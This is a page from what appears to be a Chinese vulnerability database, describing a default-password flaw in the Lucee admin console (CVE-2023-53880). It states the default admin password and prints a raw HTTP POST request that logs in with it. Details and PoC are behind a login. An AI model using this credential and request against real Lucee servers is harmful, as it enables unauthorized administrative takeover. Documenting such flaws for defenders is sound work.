momo安全漏洞库

多模块数据检索平台

登录 注册
返回列表

Lucee /lucee/admin/web.cfm 默认口令漏洞

CVE: CVE-2023-53880
CNVD: 暂无
CNNVD: 暂无
漏洞类型: 命令执行
漏洞等级: 高危
年份: 2026
POC_ID: 94589
漏洞描述
Lucee凭借对Java集成、HTTP、ORM和动态脚本的支持,被开发者广泛用于构建可扩展的高速应用程序。攻击者可通过默认口令漏洞控制整个平台,使用管理员权限操作核心的功能。其存在默认管理账户口令connections。 POST /lucee/admin/web.cfm HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F Connection: close Content-Length: 64 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip login_passwordweb=connections&lang=en&rememberMe=s&submit=submit
影响范围
Lucee
漏洞详情
登录后可查看漏洞详情。请先 登录注册
漏洞 POC
登录后可查看漏洞 POC。请先 登录注册
修复建议
暂无